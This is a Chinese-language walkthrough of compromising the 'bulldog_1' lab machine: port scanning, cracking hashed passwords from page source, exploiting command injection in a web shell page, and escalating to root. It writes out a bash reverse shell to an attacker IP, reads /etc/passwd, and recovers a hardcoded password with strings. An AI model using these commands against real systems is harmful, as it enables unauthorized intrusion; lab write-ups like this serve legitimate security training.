bulldog_1 提权
一、环境
攻击机(kali)
靶机(ubuntu)
二、信息打点
1、确认目标机器以及端口收集
使用fscan工具进行测试
./fscan -h 192.168.2.0/24
发现目标开放了80和8080端口,然后就是正常的去访问一下
打开之后都是这个页面,然后对这个页面的功能点进行点击,发现没啥有用的信息
2、尝试目录扫描
三、渗透测试
发现存在登陆的接口,一个一个尝试访问,看看有没有什么敏感的信息
/robots.txt
/dev
出现一串信息,然后发现页面最低下有一些特别的信息
然后我就猜测这些邮箱会不会是账号之类的,然后就是打开前段代码看一下
出现一堆哈希值,然后就是尝试一下md5解密,最后解密了半天只有最后两个可以解密成功
整理一下有用的信息
nick@bulldogindustries.com bulldog
sarah@bulldogindustries.com bulldoglover
然后尝试访问登陆页面
登陆
发现使用邮箱登陆不可行,于是一看邮箱前面那个应该可能是用户,尝试登陆
登陆成功,果然登陆只需要输入前面的用户名就行了
然后看了一圈登陆后的页面,没什么东西,然后想着dev目录下有一个webshell的链接,只不过得登陆之后才能访问,现在已经登陆,可以直接访问了
看到这个页面我就想起了可能存在命令执行漏洞
echo | id 查看一下当前用户的ID
命令可以执行,那么想着能不能反弹shell呢
echo "bash -i >& /dev/tcp/192.168.2.130/8888 0>&1" |bash 反弹shell
kali开启监听
执行命令
发现shell弹成功了,只不过权限有点低
四、提权
1、先查看一下当前用户有哪些
django@bulldog:/home/django/bulldog$ cat /etc/passwd
cat /etc/passwd
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12👨/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync❌100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network❌101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve❌102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy❌103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog❌104:108::/home/syslog:/bin/false
_apt❌105:65534::/nonexistent:/bin/false
lxd❌106:65534::/var/lib/lxd/:/bin/false
messagebus❌107:111::/var/run/dbus:/bin/false
uuidd❌108:112::/run/uuidd:/bin/false
dnsmasq❌109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
bulldogadmin❌1000:1000:bulldogadmin,,,:/home/bulldogadmin:/bin/bash
django❌1001:1001:,,,:/home/django:/bin/bash
sshd❌110:65534::/var/run/sshd:/usr/sbin/nologin
然后发现bulldogadmin这个用户,于是可以访问这个目录看一下
然后发现了这个目录,继续访问
使用cat命令查看customPermissionApp文件时会出现一些乱码,无法找到一些有用的信息,所以可以尝试使用strings命令进行查看
strings customPermissionApp
出现了几行字符串,然后尝试拼接一下说不定就是密码,尝试了之后发现每行后面的H是用来混淆的,直接去掉,
password:SUPERultimatePASSWORDyouCANTget
然后尝试登陆,发现直接使用 su -是无法直接登陆还报错,于是尝试使用python进行提权
python -c 'import pty; pty.spawn("/bin/bash")'
调用本地的 shell
接着输入 sudo su
然后发现权限变成root了,成功提权
